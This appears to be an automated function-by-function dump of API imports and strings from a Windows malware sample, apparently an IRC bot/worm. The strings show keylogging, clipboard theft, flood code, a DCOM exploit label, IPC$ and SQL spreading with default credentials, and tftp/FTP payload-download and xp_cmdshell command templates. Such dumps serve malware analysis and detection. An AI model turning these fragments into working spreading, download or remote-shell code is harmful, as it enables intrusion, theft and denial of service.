sub_outside(): WS2_32.WSAStartup WS2_32.WSASocketA WS2_32.setsockopt WS2_32.ntohs WS2_32.ntohl WS2_32.sendto WS2_32.WSAGetLastError WS2_32.closesocket WS2_32.WSACleanup WS2_32.socket KERNEL32.GetLocalTime USER32.GetForegroundWindow USER32.GetWindowTextA KERNEL32.Sleep USER32.GetKeyState USER32.GetAsyncKeyState WS2_32.inet_addr WS2_32.bind WS2_32.WSAIoctl WS2_32.recv WS2_32.inet_ntoa WS2_32.connect WS2_32.gethostbyname WS2_32.send WS2_32.shutdown WS2_32.ioctlsocket WS2_32.listen WS2_32.select WS2_32.__WSAFDIsSet WS2_32.accept KERNEL32.FindFirstFileA KERNEL32.FindNextFileA KERNEL32.CreateThread NTDLL.RtlGetLastWin32Error KERNEL32.SearchPathA KERNEL32.CreateFileA IPHLPAPI.IcmpCreateFile IPHLPAPI.IcmpSendEcho IPHLPAPI.IcmpCloseHandle WS2_32.getsockname KERNEL32.SetFilePointer KERNEL32.ReadFile KERNEL32.CloseHandle WININET.InternetOpenUrlA KERNEL32.GetTickCount WININET.InternetReadFile SHELL32.ShellExecuteA KERNEL32.ExitProcess WININET.InternetCloseHandle KERNEL32.SetErrorMode WS2_32.gethostbyaddr DNSAPI.DnsFlushResolverCache KERNEL32.GetLocaleInfoA KERNEL32.GetVersionExA ADVAPI32.RegOpenKeyExA ADVAPI32.RegSetValueExA ADVAPI32.RegCloseKey KERNEL32.GetVersion KERNEL32.LCMapStringW KERNEL32.MultiByteToWideChar KERNEL32.WideCharToMultiByte KERNEL32.UnhandledExceptionFilter KERNEL32.GetStringTypeW |
sub_41DF39(0126): KERNEL32.SetUnhandledExceptionFilter |
sub_40C30C(019e): "%sKB" "failed" |
sub_40A996(04c3): KERNEL32.GetTickCount "%dd %dh %dm" |
sub_41454F(04fb): WS2_32.inet_ntoa KERNEL32.CreateThread KERNEL32.Sleep KERNEL32.CloseHandle WS2_32.ntohl |
sub_40283D(0675): WS2_32.inet_addr WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.recv WS2_32.send KERNEL32.Sleep WS2_32.closesocket "Tilesoft.com" "sf." "sf" "78001" "echo open %s %d >> eq&echo user %s %s >"... |
sub_41CEF9(0715): "..." "Runtime Error!\n\nProgram: " "\n\n" "Microsoft Visual C++ Runtime Library" |
sub_413074(0b6c): ADVAPI32.OpenSCManagerA ADVAPI32.EnumServicesStatusA NTDLL.RtlGetLastWin32Error ADVAPI32.CloseServiceHandle "The following Windows services are regi"... " Unknown" " Paused" " Pausing" " Continuing" " Running" " Stoping" " Starting" " Stopped" "%s: %s (%s)" |
sub_41E6CE(0e35): KERNEL32.LoadLibraryA "user32.dll" "MessageBoxA" "GetActiveWindow" "GetLastActivePopup" |
sub_4036EB(10b8): WS2_32.inet_addr WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.recv WS2_32.send KERNEL32.Sleep WS2_32.closesocket "Tilesoft.com" "tftp -i %s get %s\r\n" "echo open %s %d > o&echo user 1 1 >> o "... |
sub_407636(22a3): "%d.%d.%d.%d" |
sub_40AD69(23e7): WININET.InternetGetConnectedStateExA "[NETINFO]: [Type]: %s (%s). [IP Address"... |
sub_412B7E(24da): WS2_32.inet_addr WS2_32.socket WS2_32.ntohs WS2_32.connect WS2_32.send WS2_32.recv WS2_32.closesocket |
sub_4149C4(2870): ADVAPI32.RegOpenKeyExA ADVAPI32.RegSetValueExA ADVAPI32.RegCloseKey KERNEL32.GetDriveTypeA "Software\\Microsoft\\OLE" "EnableDCOM" "SYSTEM\\CurrentControlSet\\Control\\Lsa" "restrictanonymous" "%c$" "%c:\\" |
sub_4071E3(28ed): WS2_32.inet_ntoa |
sub_406A16(2b64): KERNEL32.CreateFileA KERNEL32.SetFilePointer KERNEL32.ReadFile WS2_32.send WS2_32.WSAGetLastError KERNEL32.CloseHandle |
sub_40AAB5(2cf5): KERNEL32.GetVersionExA ADVAPI32.GetUserNameA WS2_32.inet_addr WS2_32.gethostbyaddr "95" "NT" "98" "ME" "2K" "XP" "2003" "couldn't resolve host" "dd:MMM:yyyy" "HH:mm:ss" "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"... |
sub_41F825(2ded): KERNEL32.CompareStringW KERNEL32.CompareStringA KERNEL32.MultiByteToWideChar |
sub_419ECF(2e75): "KERNEL32" "IsProcessorFeaturePresent" |
sub_414482(2fa7): WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.inet_ntoa WS2_32.closesocket |
sub_41D53A(30b8): KERNEL32.CreateFileA KERNEL32.CloseHandle NTDLL.RtlGetLastWin32Error |
sub_40B43D(3339): "rb" |
sub_4084B7(3672): WS2_32.select WS2_32.__WSAFDIsSet WS2_32.recv WS2_32.send |
sub_41E82C(38ba): NTDLL.RtlGetLastWin32Error |
sub_4075EE(3b1d): WS2_32.ntohl |
sub_4133A6(3fe3): ADVAPI32.IsValidSecurityDescriptor "Share name: Resource: "... "Yes" "No" "%-14S %-24S %-6u %-4s" |
sub_403178(40e5): "Tilesoft.com" "FXNBFXFXNBFXFXFXFX" |
sub_41C8B3(4558): "C:\\m_unpacker\\packed.exe" |
sub_4150B4(49d9): WS2_32.closesocket |
sub_414047(4a23): KERNEL32.CloseHandle |
sub_419FF6(502f): "e+000" |
sub_418A63(55e5): KERNEL32.HeapCreate KERNEL32.HeapDestroy |
sub_418B08(597c): KERNEL32.VirtualFree NTDLL.RtlFreeHeap |
sub_40C2C4(5b85): KERNEL32.GetDiskFreeSpaceExA |
sub_4033CB(5b94): KERNEL32.CreateFileA KERNEL32.CloseHandle KERNEL32.ReadFile WS2_32.socket WS2_32.ntohs WS2_32.inet_addr WS2_32.connect WS2_32.send WS2_32.recv WS2_32.closesocket KERNEL32.Sleep |
sub_415E1D(5c3f): NTDLL.RtlFreeHeap |
sub_40484C(5f99): WS2_32.send "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"... |
sub_41BB5F(6091): KERNEL32.SetFilePointer NTDLL.RtlGetLastWin32Error |
sub_402988(60ad): WS2_32.ntohs WS2_32.send WS2_32.recv KERNEL32.Sleep |
sub_41E757(60b5): NTDLL.RtlAllocateHeap |
sub_41EFE4(6338): "1#SNAN" "1#IND" "1#INF" "1#QNAN" |
sub_4191ED(64eb): KERNEL32.VirtualAlloc |
sub_41E142(65fe): KERNEL32.WideCharToMultiByte "TZ" |
sub_41D16F(66df): KERNEL32.WideCharToMultiByte |
sub_41AC28(6954): NTDLL.RtlSizeHeap |
sub_413DB8(6c54): KERNEL32.CreateToolhelp32Snapshot KERNEL32.Process32First KERNEL32.Process32Next KERNEL32.Module32First KERNEL32.CloseHandle "SeDebugPrivilege" " %s (%d)" "SeDebugPrivilege" |
sub_40776F(6d05): KERNEL32.GetTickCount WS2_32.inet_ntoa NTDLL.RtlEnterCriticalSection NTDLL.RtlLeaveCriticalSection KERNEL32.Sleep "dcom135" |
sub_40446E(6e81): WS2_32.select WS2_32.__WSAFDIsSet WS2_32.recv |
sub_407D6A(6eca): WS2_32.socket WS2_32.ntohs WS2_32.inet_addr WS2_32.gethostbyname WS2_32.gethostbyaddr WS2_32.connect WS2_32.inet_ntoa KERNEL32.CreateThread KERNEL32.Sleep WS2_32.recv WS2_32.send NTDLL.RtlGetLastWin32Error WS2_32.closesocket |
sub_408884(6f69): KERNEL32.FindFirstFileA KERNEL32.FindNextFileA "%s\\*" "%s\\%s" " Found: %s\\%s" |
sub_407983(6f89): WS2_32.inet_addr NTDLL.RtlDeleteCriticalSection KERNEL32.InitializeCriticalSectionAndSpinCount KERNEL32.CreateThread KERNEL32.Sleep NTDLL.RtlGetLastWin32Error WS2_32.inet_ntoa |
sub_414376(71f8): KERNEL32.GetTickCount USER32.FindWindowA "mIRC" |
sub_40A59D(7918): KERNEL32.CloseHandle |
sub_412EF6(79f8): "The specified service name is invalid." "The requested control code is undefined"... "The handle is invalid." "The handle does not have the required a"... "The service binary file could not be fo"... "The service cannot be stopped because o"... "The database is locked." "A thread could not be created for the s"... "The process for the service was started"... "The requested control code is not valid"... "An instance of the service is already r"... "The system is shutting down." "An unknown error occurred: <%ld>" |
sub_41410C(7e76): KERNEL32.GetTickCount |
sub_41C40A(8026): NTDLL.RtlGetLastWin32Error |
sub_413D4D(8091): ADVAPI32.LookupPrivilegeValueA ADVAPI32.AdjustTokenPrivileges KERNEL32.CloseHandle |
sub_41FD90(822d): "string too long" |
sub_41FFBC(822d): "invalid string position" |
sub_402FDD(840c): KERNEL32.MultiByteToWideChar "\\IPC$" "\\\\" |
sub_40B4AF(8474): WS2_32.socket WS2_32.ntohs WS2_32.inet_addr WS2_32.gethostbyname WS2_32.connect WS2_32.closesocket |
sub_4185AB(84ec): KERNEL32.CloseHandle NTDLL.RtlGetLastWin32Error |
sub_40A03F(86a9): WS2_32.inet_addr WS2_32.gethostbyname |
sub_415207(8732): "%s: %s stopped. (%d thread(s) stopped.)"... "%s: No %s thread found." |
sub_41360D(893c): "Account: %S" "Full Name: %S" "User Comment: %S" "Comment: %S" "Unknown" "Administrator" "User" "Guest" "Privilege Level: %s" "Auth Flags: %d" "Home Directory: %S" "Parameters: %S" "Password Age: %d" "Bad Password Count: %d" "Number of Logins: %d" "Last Logon: %d" "Last Logoff: %d" "Logon Server: %S" "Country Code: %d" "User's Language: %d" "Max. Storage: %d" |
sub_416348(8af0): NTDLL.RtlUnwind |
sub_413270(8cdb): KERNEL32.WideCharToMultiByte |
sub_409C76(8e50): USER32.OpenClipboard USER32.GetClipboardData KERNEL32.GlobalLock KERNEL32.GlobalUnlock USER32.CloseClipboard |
sub_4030C0(90cb): KERNEL32.MultiByteToWideChar KERNEL32.Sleep "\\IPC$" "\\\\" |
sub_4176E9(91cb): KERNEL32.GetFileAttributesA NTDLL.RtlGetLastWin32Error |
sub_40A077(92a8): IPHLPAPI.GetIpNetTable IPHLPAPI.DeleteIpNetEntry |
sub_405B07(95cc): WS2_32.ntohs WS2_32.socket WS2_32.bind WS2_32.listen WS2_32.ioctlsocket WS2_32.select WS2_32.__WSAFDIsSet WS2_32.accept WS2_32.recv WS2_32.closesocket WS2_32.WSAGetLastError "GET " " " "\r\n" |
sub_4179D9(95ea): KERNEL32.MultiByteToWideChar NTDLL.RtlGetLastWin32Error |
sub_4059F0(9713): WS2_32.WSAStartup WS2_32.socket WS2_32.inet_addr WS2_32.ntohs WS2_32.connect WS2_32.closesocket WS2_32.WSACleanup |
sub_40A387(9819): KERNEL32.GetTickCount WS2_32.socket WS2_32.inet_addr WS2_32.gethostbyname WS2_32.ntohs WS2_32.sendto KERNEL32.Sleep |
sub_4044ED(981b): WS2_32.ntohl WS2_32.send |
sub_41DFAD(9a80): KERNEL32.MultiByteToWideChar |
sub_413B5B(9bb4): "Invalid parameter." "Server name not found." "This network request is not supported." "Not enough memory." "The name is invalid." "Duplicate share name." "Invalid for redirected resource." "Device or directory does not exist." "Level parameter is invalid." "A general failure occurred in the netwo"... "The operation is allowed only on the pr"... "The user account already exists." "The group already exists." "The password is shorter than required ("... "An unknown error occurred." "The computer name is invalid." "Share not found." "The user name could not be found." "Network connection not found." |
sub_401BD6(9cde): KERNEL32.GetTickCount WS2_32.socket WS2_32.WSAGetLastError WS2_32.setsockopt WS2_32.inet_addr WS2_32.ntohs WS2_32.ntohl WS2_32.sendto WS2_32.closesocket "syn" "ack" "random" |
sub_409DD7(9dbe): USER32.ExitWindowsEx "SeShutdownPrivilege" |
sub_4178DC(a10d): NTDLL.RtlGetLastWin32Error |
sub_40460C(a2f7): WS2_32.send |
sub_407119(a6b1): " %s: %d," " Total: %d in %s." |
sub_4076D2(a6ca): WS2_32.socket WS2_32.ntohs WS2_32.ioctlsocket WS2_32.connect WS2_32.select WS2_32.closesocket |
sub_40A9FF(a7c4): KERNEL32.Sleep |
sub_4139DB(a909): "Username accounts for local system:" " %S" "Total users found: %d." |
sub_412E54(a9bc): ADVAPI32.OpenSCManagerA NTDLL.RtlGetLastWin32Error ADVAPI32.OpenServiceA ADVAPI32.ControlService ADVAPI32.StartServiceA ADVAPI32.DeleteService ADVAPI32.CloseServiceHandle |
sub_409CB1(aafd): USER32.FindWindowA "mIRC" |
sub_4140AE(ac14): KERNEL32.GetTickCount "%s" |
sub_409663(ac3c): "Kernel32.dll failed. <%d>" "User32.dll failed. <%d>" "Advapi32.dll failed. <%d>" "Gdi32.dll failed. <%d>" "Ws2_32.dll failed. <%d>" "Wininet.dll failed. <%d>" "Icmp.dll failed. <%d>" "Netapi32.dll failed. <%d>" "Dnsapi.dll failed. <%d>" "Iphlpapi.dll failed. <%d>" "Mpr32.dll failed. <%d>" "Shell32.dll failed. <%d>" "Odbc32.dll failed. <%d>" "Avicap32.dll failed. <%d>" |
sub_407BE2(ad7c): WS2_32.ntohs WS2_32.socket WS2_32.WSAAsyncSelect WS2_32.bind WS2_32.listen WS2_32.accept WS2_32.inet_ntoa KERNEL32.CreateThread KERNEL32.Sleep NTDLL.RtlGetLastWin32Error WS2_32.closesocket |
sub_4201E9(aeff): KERNEL32.RaiseException |
sub_417BF3(af5c): KERNEL32.ExitProcess |
sub_413342(afa1): KERNEL32.MultiByteToWideChar |
sub_40C27B(b2db): KERNEL32.GetDriveTypeA "RAM" "Cdrom" "Network" "Disk" "Invalid" "Unknown" |
sub_409F81(b885): KERNEL32.CreateFileA "@echo off\r\nEcho REGEDIT4>%temp%\\1.reg\r\n"... "c:\\ab3.bat" |
sub_40CB59(bc9b): WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.closesocket KERNEL32.Sleep |
sub_40CCC1(c24e): WS2_32.send WS2_32.closesocket KERNEL32.Sleep WS2_32.recv "PASS %s\r\n" |
sub_412D32(c35a): WS2_32.send KERNEL32.Sleep "NOTICE" "PRIVMSG" "%s" |
sub_41B969(c6bf): KERNEL32.ReadFile NTDLL.RtlGetLastWin32Error |
sub_402DDD(c7bf): WS2_32.inet_addr WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.send WS2_32.recv WS2_32.closesocket |
sub_412CEC(c85a): WS2_32.send |
sub_40B392(c8ef): ADVAPI32.RegCreateKeyExA ADVAPI32.RegSetValueExA ADVAPI32.RegDeleteValueA ADVAPI32.RegCloseKey "Topic Soft" |
sub_41CB00(cb46): KERNEL32.GetEnvironmentStringsW KERNEL32.GetEnvironmentStringsA KERNEL32.WideCharToMultiByte KERNEL32.FreeEnvironmentStringsW |
sub_4160A4(cba9): NTDLL.RtlUnwind |
sub_41913C(cbe8): NTDLL.RtlReAllocateHeap NTDLL.RtlAllocateHeap KERNEL32.VirtualAlloc NTDLL.RtlFreeHeap |
sub_40AE2F(cc2f): WININET.InternetCrackUrlA WININET.InternetConnectA WININET.HttpOpenRequestA WININET.HttpSendRequestA WININET.InternetCloseHandle |
sub_409DF9(d219): KERNEL32.CreateFileA KERNEL32.GetFileAttributesA "%sdel.bat" "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"... "%%comspec%% /c %s %s" |
sub_4196C9(d2f6): KERNEL32.RaiseException |
sub_4174BF(d50c): NTDLL.RtlAllocateHeap NTDLL.RtlReAllocateHeap |
sub_41DF28(d8fa): KERNEL32.SetUnhandledExceptionFilter |
start(dabc): KERNEL32.GetTickCount |
sub_40C4F9(dc5b): KERNEL32.GetLogicalDriveStringsA "A:\\" |
sub_40A155(e076): WS2_32.getsockname "%d.%d.%d.%d" |
sub_406B01(e1a1): WS2_32.WSAStartup WS2_32.socket WS2_32.ntohs WS2_32.connect WS2_32.send WS2_32.recv WS2_32.closesocket WS2_32.WSACleanup "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"... |
sub_403C8B(e3cd): WS2_32.inet_addr WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.send WS2_32.recv WS2_32.closesocket |
sub_4051A0(e422): WS2_32.inet_addr WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.recv WS2_32.send KERNEL32.Sleep WS2_32.closesocket "Tilesoft.com" "echo open %s %d > o&echo user 1 1 >> o "... |
sub_418A9F(e71f): NTDLL.RtlAllocateHeap |
sub_4089D6(eb03): KERNEL32.GetModuleHandleA NTDLL.RtlGetLastWin32Error KERNEL32.LoadLibraryA WININET.InternetOpenA "kernel32.dll" "SetErrorMode" "CreateToolhelp32Snapshot" "Process32First" "GetDiskFreeSpaceExA" "GetLogicalDriveStringsA" "SearchPathA" "QueryPerformanceCounter" "QueryPerformanceFrequency" "RegisterServiceProcess" "user32.dll" "SendMessageA" "FindWindowA" "IsWindow" "GetClipboardData" "CloseClipboard" "GetAsyncKeyState" "GetKeyState" "GetWindowTextA" "GetForegroundWindow" "advapi32.dll" "RegCreateKeyExA" "RegSetValueExA" "RegQueryValueExA" "RegDeleteValueA" "RegCloseKey" "OpenProcessToken" "LookupPrivilegeValueA" "AdjustTokenPrivileges" "OpenSCManagerA" "OpenServiceA" "ControlService" "CloseServiceHandle" "EnumServicesStatusA" "IsValidSecurityDescriptor" "GetUserNameA" "gdi32.dll" "CreateDCA" "CreateDIBSection" "CreateCompatibleDC" "GetDIBColorTable" "SelectObject" "BitBlt" "DeleteDC" "DeleteObject" "ws2_32.dll" "WSAStartup" "WSASocketA" "WSAAsyncSelect" "__WSAFDIsSet" "WSAIoctl" "WSAGetLastError" "WSACleanup" "socket" "ioctlsocket" "connect" "inet_ntoa" "inet_addr" "htons" "htonl" "ntohs" "ntohl" "send" "sendto" "recv" "recvfrom" "bind" "select" "listen" "accept" "setsockopt" "getsockname" "gethostname" "getpeername" "closesocket" "wininet.dll" "InternetGetConnectedState" "InternetGetConnectedStateEx" "HttpOpenRequestA" "HttpSendRequestA" "InternetConnectA" "InternetOpenUrlA" "InternetCrackUrlA" "InternetReadFile" "InternetCloseHandle" "Mozilla/4.0 (compatible)" "icmp.dll" "IcmpCreateFile" "IcmpCloseHandle" "IcmpSendEcho" "netapi32.dll" "NetShareAdd" "NetShareDel" "NetShareEnum" "NetScheduleJobAdd" "NetApiBufferFree" "NetRemoteTOD" "NetUserAdd" "NetUserDel" "NetUserEnum" "NetUserGetInfo" "NetMessageBufferSend" "dnsapi.dll" "DnsFlushResolverCache" "DnsFlushResolverCacheEntry_A" "iphlpapi.dll" "DeleteIpNetEntry" "mpr.dll" "WNetAddConnection2A" "WNetAddConnection2W" "WNetCancelConnection2A" "WNetCancelConnection2W" "shell32.dll" "SHChangeNotify" "odbc32.dll" "SQLDriverConnect" "SQLAllocHandle" "avicap32.dll" "capCreateCaptureWindowA" "capGetDriverDescriptionA" |
sub_40384C(ec29): WS2_32.ntohs WS2_32.send WS2_32.recv KERNEL32.Sleep |
sub_40B151(edda): KERNEL32.GetLocalTime "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s" |
sub_4085B7(ef39): ADVAPI32.RegOpenKeyExA ADVAPI32.RegQueryValueExA ADVAPI32.RegCloseKey "%s\\%s" "r" "=" "=" |
sub_4060E4(f006): KERNEL32.GetFileAttributesA WS2_32.closesocket KERNEL32.CreateFileA KERNEL32.CloseHandle KERNEL32.CreateThread KERNEL32.Sleep NTDLL.RtlGetLastWin32Error "\\%s" "%s" "%s%s" "\n" "*" |
sub_404108(f1cc): "BBBB" "CCCC" |
sub_40A7E1(f4ac): KERNEL32.SearchPathA KERNEL32.CreatePipe KERNEL32.GetCurrentProcess KERNEL32.CloseHandle KERNEL32.CreateThread NTDLL.RtlGetLastWin32Error "cmd.exe" |
sub_40C427(f5ac): "failed" |
sub_415DE7(fd6e): NTDLL.RtlAllocateHeap |
sub_41F7B7(fe6c): KERNEL32.WideCharToMultiByte |
sub_404F08(fecb): KERNEL32.Sleep "sa" "root" "admin" "Tilesoft.com" "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"... "EXEC master..xp_cmdshell 'del eq&echo o"... "EXEC master..xp_cmdshell '%s'" |
sub_40A068(ff15): DNSAPI.DnsFlushResolverCache |